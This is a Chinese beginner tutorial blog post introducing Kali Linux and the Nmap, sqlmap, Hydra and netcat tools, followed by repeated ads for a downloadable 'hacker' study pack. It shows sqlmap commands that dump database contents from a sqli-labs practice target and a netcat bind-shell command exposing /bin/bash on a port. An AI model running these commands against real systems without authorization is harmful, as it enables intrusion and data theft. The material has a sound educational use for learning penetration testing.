Kali Linux 入门指南：黑客工具箱大揭秘，从零基础到精通，收藏这篇就够了！

唠嗑两句

各位小伙伴，想必大家在闯荡网络安全江湖的时候，都听说过 Kali Linux 的大名，它可是被誉为“黑客最爱的系统”。那么问题来了，Kali 到底是何方神圣？初学者用 Kali 都能干些啥？别着急，今天我就带大家扒一扒 Kali 的老底，保证让你看完直呼“真香”！

一、Kali Linux 到底是啥？

简单来说，Kali Linux 就是一款专门为渗透测试量身打造的 Linux 操作系统，它是由 BackTrack 进化而来。当年，BackTrack 为了集齐 IWHAX、WHOPPIX 和 Auditor 这三位渗透测试界的“扛把子”，干脆合体变身成了 Kali Linux。没错，Kali 的本质还是 Linux 系统，只不过它把黑客们常用的工具都打包在一起了，省去了大家到处下载安装的麻烦。至于为啥黑客都爱用 Kali，那还不是因为它工具齐全，用啥都有，简直就是居家旅行、攻防演练必备神器！

二、Kali 下载安装一条龙

Kali 官网传送门：https://www.kali.org

Kali 团队也是卷王，一直保持着更新，现在最新的系统是 Kali Purple，据说里面集成了更多防守方使用的工具。这年头，攻防兼备才是王道啊！

下载解压后，用 VMware 打开就行了，默认 root 账号密码都是 kali。没用过 VMware 的小伙伴可以先去网上学学，一搜一大把教程。另外，新手可能会遇到虚拟机没网的问题，我建议先选择直接连接，等以后对网卡、网段啥的熟悉了，再自己配置也不迟。（操作路径：左上角虚拟机 -> 设置 -> 网络适配器 -> 桥接模式 -> 复制物理网络连接状态）

三、Kali 常用工具大盘点

正如前面所说，Kali 里面集成了海量的黑客工具和网络安全工具，毫不夸张地说，黑客想干的任何事情，都能在这个系统里找到对应的工具。下面我就给大家推荐几个新手入门必备的小工具。

1. Nmap：网络世界的“诸神之眼”

Nmap 被称为“诸神之眼”，可见其功力之深厚。它是一款非常强大的网络探测工具，可以实现主机发现和端口扫描，还能加载漏洞扫描脚本，对主机端口进行漏洞扫描。

Nmap 最最最基础的用法：

nmap [目标IP]  # 例如：nmap 192.168.1.10
nmap [目标网段] # 例如：nmap 192.168.1.0/24

Nmap 还提供了大量的扫描参数，可以定制你的扫描策略，下面列举几个常用的参数：

添加不同的参数，就能得到不同的扫描结果，简直不要太灵活！

2. Sqlmap：SQL 注入一把梭

Sqlmap 是一款针对 SQL 注入漏洞 的自动化探测工具，支持各种操作系统和数据库。渗透测试人员经常调侃：“没有什么技术含量，就是 sqlmap 一把梭，屏幕变绿就下班！”（当然，这只是玩笑话，技术还是要学的！）

Sqlmap 的基本使用方法：

sqlmap -u "www.example.com"

友情提示：千万不要在未经授权的情况下对公网资产进行批量扫描，小心喜提“银手镯”套餐！

下面我以 sqli-lab 里面的靶场为例，给大家演示一下 Sqlmap 的用法：

如果出现上图中的绿色信息，就说明 Sqlmap 成功注入了该参数。注意，我的 URL 中以 GET 方式传递了参数 id（/?id），如果不给 Sqlmap 提供参数，它是无法工作的哦。

找到注入点之后，就可以按部就班地进行下一步操作了：

sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" --dbs  # 获取当前数据库服务所开启的数据库名称
sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" -D 数据库名 --tables  # 获取某数据库下的所有表名
sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" -D 数据库名 -T 表名 --columns # 获取 D 数据库下 T 表内的所有字段
sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" -D 数据库名 -T 表名 -C 字段名 --dump  # 将该字段的内容全部获取出来并存储，在最后的信息中会有存储路径信息

第一步：获取数据库

第二步：获取数据库下的表名

第三步：获取该表字段（其实到表名这一步可以直接 –dump 获取表里所有内容）

所以，Sqlmap 的难点在于如何找到注入点，也就是找到产生 SQL 注入的参数。在上面的例子里，参数是 GET 方式上传的 "id" 参数。下面再给大家提供一些 Sqlmap 常用的参数：

3. Hydra：九头蛇的暴力美学

Hydra 又称九头蛇，是一款非常高效的爆破工具，支持多种协议。它可以对指定 IP 的指定服务进行爆破，你需要提供爆破字典或者指定爆破数据（比如已知账号为 admin 时爆破密码）。

在 Kali 中，Hydra 有图形化和命令行两种使用方式：

对于新手来说，图形化界面更加友好，下面简单介绍一下图形化界面的使用方法：

设置完毕后，点击 Start 就可以开始爆破了。Hydra 会使用字典中的所有账号密码去尝试登陆。

4. Netcat：网络界的瑞士军刀

Netcat 简称 nc，是一款非常常用的网络工具，它提供基于 socket 协议套接字针对 TCP、UDP 连接的网络使用。只要你有 nc 的使用权，几乎可以建立任何类型的连接。在渗透测试中，通常用它来获取目标 IP 的 shell。

Nc 简单使用方式：建立连接传输信息

主机 1：开启对 6666 端口的监听

nc -lvp 6666

参数解释：

主机 2：连接主机 1 的 6666 端口

nc 192.168.0.163 6666

Nc 常用使用：获取远程主机 shell

1. 正向连接 shell

主机 1：

nc -lvp 6666 -e /bin/bash

参数解释：

这里将主机 1 的 /bin/bash 重定向到了自己主机的 6666 端口。

主机 2：

nc 192.168.0.163 6666

大家可以思考一下为什么左边会有下面的报错呢？并且在执行 sudo su 尝试进入 root 权限时，必须在左侧主机输入密码才可以进入，进入后才会收到来自右侧发来的密码 kali 并且产生报错。可以尝试了解不同终端 bash/zsh/sh 的区别。

总结

本文简单介绍了 Kali 系统，希望能给对它感兴趣的新手小白一个入门引导。记住，网络安全之路漫漫，Kali 只是一个工具，更重要的是不断学习和实践，才能成为真正的安全大佬！

黑客/网络安全学习包

资料目录

1. 成长路线图&学习规划

2. 配套视频教程

3. SRC&黑客文籍

4. 护网行动资料

5. 黑客必读书单

6. 面试题合集

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

*************************************优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

1.成长路线图&学习规划

要学习一门新的技术，作为新手一定要先学习成长路线图，方向不对，努力白费。

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

*************************************优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

2.视频教程

很多朋友都不喜欢晦涩的文字，我也为大家准备了视频教程，其中一共有21个章节，每个章节都是当前板块的精华浓缩。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

*************************************优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍：

黑客资料由于是敏感资源，这里不能直接展示哦！

4.护网行动资料

其中关于HW护网行动，也准备了对应的资料，这些内容可相当于比赛的金手指！

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里，你就要开始思考找工作的事情了，而工作绕不开的就是真题和面试题。

更多内容为防止和谐，可以扫描获取~

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

*************************************优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享*********************************